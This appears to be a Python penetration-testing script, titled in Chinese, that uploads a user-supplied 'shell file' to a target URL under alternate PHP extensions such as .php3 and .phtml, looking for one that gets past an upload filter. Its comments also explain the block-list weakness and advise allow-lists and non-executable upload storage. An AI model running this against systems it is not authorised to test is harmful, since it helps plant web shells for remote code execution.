
利用Python編寫測試可以繞過上傳副檔名限制的工具

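import requests
import sys
import optparse
import os


class ExtensionTest:
    """Check which PHP-style extensions a file-upload endpoint accepts.

    The local file given with ``-f`` is posted to the URL given with ``-u``
    once per entry in ``extension_list``, each time under a different file
    name. The verdict comes from the response body: if it contains the text
    "Extension not allowed" the extension counts as rejected, anything else
    counts as accepted.

    NOTE(review): that marker string is specific to the application under
    test. A response without it (an error page, a login redirect, a size
    limit message) is also reported as "allowed", so confirm any positive
    result by hand. An accepted extension from this list usually means the
    server filters uploads with a block-list; the durable fix is an
    allow-list of expected extensions plus storing uploads where the web
    server will not execute them.
    """

    def __init__(self) -> None:
        # Parse the command line once; the original parsed it twice.
        self.url, self.filename = self.get_params()
        # Possible extensions to try
        self.extension_list = ['.php', '.php2', '.php3', '.php4', '.php5', '.phtml']

    def get_params(self):
        """Parse ``-u``/``-f`` and return ``(url, filename)``.

        Prints the usage text and exits when either option is missing, and
        exits with a message when the file does not exist.
        """
        parser = optparse.OptionParser("Usage: <Program> -u url -f shell file")
        parser.add_option('-u', '--url', dest='url', type='string', help='Specify target url')
        parser.add_option('-f', '--filename', dest='filename', type='string', help='Specify shell filename')
        options, args = parser.parse_args()
        if options.url is None or options.filename is None:
            print(parser.usage)
            sys.exit(0)

        if not os.path.exists(options.filename):
            print("The shell file does not exist")
            sys.exit(0)

        return options.url, options.filename

    def file_upload(self, filename, upload_name=None):
        """Post *filename* to ``self.url`` as a multipart upload.

        Args:
            filename: Path of the local file whose content is sent.
            upload_name: File name to present in the multipart part. When
                omitted, the base name of *filename* is used, which is what
                ``requests`` would pick by default.

        Returns:
            The response body as text, or ``None`` when the file could not
            be read or the request failed.
        """
        if upload_name is None:
            upload_name = os.path.basename(filename)
        try:
            with open(filename, 'rb') as f:
                # The key must match the file field of the real HTML form,
                # otherwise the upload fails in confusing ways. It is the
                # form field name, not the file name.
                file_dict = {'file': (upload_name, f)}
                # A timeout keeps one unresponsive server from hanging the run.
                response = requests.post(self.url, files=file_dict, timeout=10)

            return response.text
        except (OSError, requests.RequestException) as exc:
            # Only I/O and HTTP failures are expected here; a bare except
            # would also hide programming errors and Ctrl-C.
            print('Upload failed: %s' % exc, file=sys.stderr)
            return None

    def run(self):
        """Try each extension in turn and stop at the first accepted one."""
        # splitext keeps dots in directory names and in "./file" intact;
        # split('.')[0] turned "./shell.php" into an empty base name.
        stem = os.path.splitext(self.filename)[0]
        for ext in self.extension_list:
            candidate = stem + ext
            print('[-] Try %s' % candidate)

            # The name is set in the request instead of renaming the file on
            # disk, so a failed request cannot leave the local file renamed
            # and break the following iterations.
            response = self.file_upload(self.filename, upload_name=os.path.basename(candidate))

            if not response:
                print('%s: no response body, result unknown' % ext)
                continue

            if "Extension not allowed" in response:
                print('%s not allowed' % ext)
            else:
                print("%s allowed" % ext)
                sys.exit(0)


if __name__ == "__main__":
    ext = ExtensionTest()
    ext.run()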